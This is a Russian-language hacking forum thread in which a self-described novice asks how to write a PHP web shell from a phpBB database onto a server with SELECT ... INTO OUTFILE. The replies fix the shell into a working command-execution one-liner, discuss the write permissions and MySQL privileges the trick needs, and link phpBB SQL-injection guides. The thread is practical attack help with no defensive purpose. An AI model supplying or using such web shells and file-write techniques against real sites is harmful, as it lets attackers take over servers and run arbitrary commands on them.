подскажите пожалуйста как правильно выкачать шелл из БД в файл на сервере, мои попытки не увенчались успехом, так как при выборке в файл чего-то символы заменяются их кодом
вот пример как я вытаскивал шелл
SELECT cat_title INTO OUTFILE 'раскрытый путь/phpbb/cache/shell.php' FROM phpbb_categories where cat_id=1; - это пример
как лучше оформить запрос или что нужно вписать в БД
текст шелла: <?p system("$_GET[cmd]"); ?>

1) Проверь - разрешена ли запись в папку cache;
2) Шелл - не <?p... , а <?php...;
3) Кавычками обрамлять надо cmd, а не весь текст в скобках (да и то невсегда).

1) Проверь - разрешена ли запись в папку cache;
2) Шелл - не <?p... , а <?php...;
3) Кавычками обрамлять надо cmd, а не весь текст в скобках (да и то невсегда).
Нифига не получиться форум в сафе режиме можно только через фтп или ищи открытую папку можно не на форуме. Т.к. весь форум закрыт на запись.

>>Нифига не получиться форум в сафе режиме
никакой связи между сафе модом в пхп и мускл сервером нет. запросы отсылаются? - отсылаюстся. стало быть достаточно чтобы текущий юзер мускул сервера обльадал необходимыми привилегиями - о них уже писали, и не только на форуме.

<?p system("$_GET[cmd]"); ?>
лол )))))) такой код никогда и не заработает

Как я понял, там стоит phpBB. Тоды тебе сюда:
1 (http://zadoxlik.antichat.ru/phpbbphp2sqlinj)
2 (http://video.antichat.ru/file178.html)

спасибо, что указали на ошибки, так как я недавно практикую с хакингом, просто ради интереса.
как я понял код должен быть таким:
<?php system($_GET["cmd"]); ?>
правильно?

Лол млин учись нормально код делать

или так <? system(GET['cmd']); ?>
или так <?php system(GET['cmd']); ?>